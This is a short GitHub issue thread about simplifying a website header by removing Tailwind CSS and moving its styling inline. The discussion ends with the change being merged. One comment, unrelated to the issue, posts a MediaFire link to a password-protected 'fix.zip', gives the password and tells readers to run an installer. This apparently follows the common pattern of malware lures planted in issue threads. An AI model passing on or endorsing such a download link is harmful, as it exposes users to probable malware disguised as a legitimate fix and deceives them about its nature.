### ISSUE TITLE
Simplification of header - remove tailwind code

### ISSUE THREAD

**Issue by rbbeeston** [boostorg/website-v2#1212]
Currently the header is more complex than it needs to be and the tailwind CSS causes problems when imported into docs headers. This ticket is to remove the unnecessary complexity and move styling to an inline style tag in the header, preferably scoped in some way, to solve import issues and create more consistency.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kennethreitz** [comment]
I'm having some strange behavior with the header locally right now. Trying to get to the bottom of it. This may fix the issue, though!

**Comment by rbbeeston** [comment]
merged. Issues mentioned by Kenneth were unrelated
